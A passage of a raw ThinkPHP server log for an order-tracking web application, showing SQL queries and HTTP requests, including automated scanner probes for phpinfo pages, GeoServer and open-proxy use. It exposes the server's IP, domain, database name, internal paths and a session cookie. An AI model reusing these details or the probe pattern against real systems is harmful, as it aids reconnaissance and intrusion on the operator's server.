RunTime:0.000131s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000437s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000816s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000461s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000736s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001106s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001004s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000346s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000755s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000665s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000805s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM ( SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount,count(*) FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE ( outbound.createtime > 1763049600 ) AND ( outbound.createtime <= 1765727999 ) AND `outboundandorder`.`verify_status` = 0 AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC ) `_group_count_` LIMIT 1 [ RunTime:0.022569s ] [ sql ] [ SQL ] SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE `outboundandorder`.`verify_status` = 0 AND ( outbound.createtime > 1763049600 ) AND ( outbound.createtime <= 1765727999 ) AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC LIMIT 0,10 [ RunTime:0.022141s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11822 [ RunTime:0.013892s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11821 [ RunTime:0.013859s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11820 [ RunTime:0.014464s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11819 [ RunTime:0.014058s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11814 [ RunTime:0.014625s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11813 [ RunTime:0.014714s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11812 [ RunTime:0.013733s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11811 [ RunTime:0.013788s ] --------------------------------------------------------------- [ 2025-12-14T17:07:02+08:00 ] 64.62.156.202 GET / [ info ] 47.105.33.115/ [运行时间:0.030110s][吞吐率:33.21req/s] [内存消耗:3,333.19kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001213s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (iPad; CPU OS 15_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6,2 Mobile/15E148 Safari/604.1', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001701s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000102s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:08:27+08:00 ] 38.58.179.181 GET http://check.9tb.org/ [ info ] check.9tb.orghttp://check.9tb.org/ [运行时间:0.029427s][吞吐率:33.98req/s] [内存消耗:3,333.26kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001308s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'check.9tb.org', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001609s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000106s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:09:55+08:00 ] 64.62.156.208 GET /favicon.ico [ info ] 47.105.33.115/favicon.ico [运行时间:0.023434s][吞吐率:42.67req/s] [内存消耗:2,225.91kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001407s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'favicon.ico', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 Safari/537.36 OPR/80.0.4170.72', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:10:31+08:00 ] 64.62.156.202 GET /geoserver/web/ [ info ] 47.105.33.115/geoserver/web/ [运行时间:0.018922s][吞吐率:52.85req/s] [内存消耗:2,225.95kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001118s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'geoserver', 1 => 'web', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (iPad; CPU OS 15_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6,2 Mobile/15E148 Safari/604.1', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:11:09+08:00 ] 64.62.156.202 GET /info.php [ info ] 47.105.33.115/info.php [运行时间:0.020693s][吞吐率:48.33req/s] [内存消耗:2,226.07kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001179s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'info.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (iPad; CPU OS 15_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6,2 Mobile/15E148 Safari/604.1', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:11:21+08:00 ] 64.62.156.202 GET /phpinfo.php [ info ] 47.105.33.115/phpinfo.php [运行时间:0.018724s][吞吐率:53.41req/s] [内存消耗:2,226.03kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001139s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'phpinfo.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:141.0) Gecko/20100101 Firefox/141.0', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:11:32+08:00 ] 64.62.156.202 GET /dashboard/phpinfo.php [ info ] 47.105.33.115/dashboard/phpinfo.php [运行时间:0.018383s][吞吐率:54.40req/s] [内存消耗:2,225.97kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000035s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001096s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'dashboard', 1 => 'phpinfo.php', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:16:06+08:00 ] 47.99.34.115 GET / [ info ] 47.105.33.115/ [运行时间:0.029079s][吞吐率:34.39req/s] [内存消耗:3,334.17kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001210s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36', 'accept-encoding' => 'gzip, deflate', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'connection' => 'keep-alive', 'accept-language' => 'zh-CN,zh;q=0.8', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001573s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000113s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:21:07+08:00 ] 176.65.149.45 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.028692s][吞吐率:34.85req/s] [内存消耗:3,332.27kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000052s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001197s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'user-agent' => 'Go-http-client/1.1', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001521s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000095s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:30:18+08:00 ] 89.248.164.165 GET http://ossweb-img.qq.com/images/js/eas/eas.js [ info ] ossweb-img.qq.comhttp://ossweb-img.qq.com/images/js/eas/eas.js [运行时间:0.021635s][吞吐率:46.22req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001285s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'images', 1 => 'js', 2 => 'eas', ), ) [ info ] [ HEADER ] array ( 'host' => 'ossweb-img.qq.com', 'user-agent' => 'Mozilla', 'if-modified-since' => 'Wed, 14 Jun 2023 09:24:00 GMT', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:30:52+08:00 ] 117.33.163.216 GET / [ info ] clcoa.com/ [运行时间:0.029368s][吞吐率:34.05req/s] [内存消耗:3,335.28kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001201s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', 'accept-encoding' => 'gzip', 'accept-language' => 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7', 'cache-control' => 'no-cache', 'connection' => 'keep-alive, close', 'pragma' => 'no-cache', 'upgrade-insecure-requests' => '1', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001646s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000113s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:33:26+08:00 ] 176.65.149.34 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.027460s][吞吐率:36.42req/s] [内存消耗:3,331.99kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001137s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001503s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000103s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:33:26+08:00 ] 176.65.149.34 GET /index.htm [ info ] 47.105.33.115:8081/index.htm [运行时间:0.020636s][吞吐率:48.46req/s] [内存消耗:2,225.13kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001212s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index.htm', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0', 'host' => '47.105.33.115:8081', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:36:58+08:00 ] 123.160.221.130 GET / [ info ] www.clcoa.com:8081/ [运行时间:0.026799s][吞吐率:37.31req/s] [内存消耗:3,286.38kb] [文件加载:67] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001168s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'www.clcoa.com:8081', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'accept-language' => 'en;q=0.9', 'cache-control' => 'max-age=0', 'dnt' => '1', 'sec-gpc' => '1', 'upgrade-insecure-requests' => '1', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001497s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000118s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:36:58+08:00 ] 123.160.221.130 GET / [ info ] www.clcoa.com:8081/ [运行时间:0.026898s][吞吐率:37.18req/s] [内存消耗:3,285.34kb] [文件加载:67] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001088s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'www.clcoa.com:8081', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', 'accept-language' => 'en', 'upgrade-insecure-requests' => '1', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001480s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000118s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:37:02+08:00 ] 123.160.221.130 GET /admin/index/login?url=%2F [ info ] www.clcoa.com:8081/admin/index/login?url=%2F [运行时间:0.049677s][吞吐率:20.13req/s] [内存消耗:3,782.39kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000057s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001812s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'index', 2 => 'login', ), ) [ info ] [ HEADER ] array ( 'host' => 'www.clcoa.com:8081', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', 'accept-language' => 'en', 'cookie' => 'PHPSESSID=rkmcph4anf59f5grciggrgfsn7', 'referer' => 'http://www.clcoa.com:8081/', 'upgrade-insecure-requests' => '1', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( 'url' => '/', ) [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.002615s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ RUN ] app\admin\controller\Index->login[ /alidata/www/gendan/application/admin/controller/Index.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/index/login.html [ array ( 0 => 'breadcrumb', 1 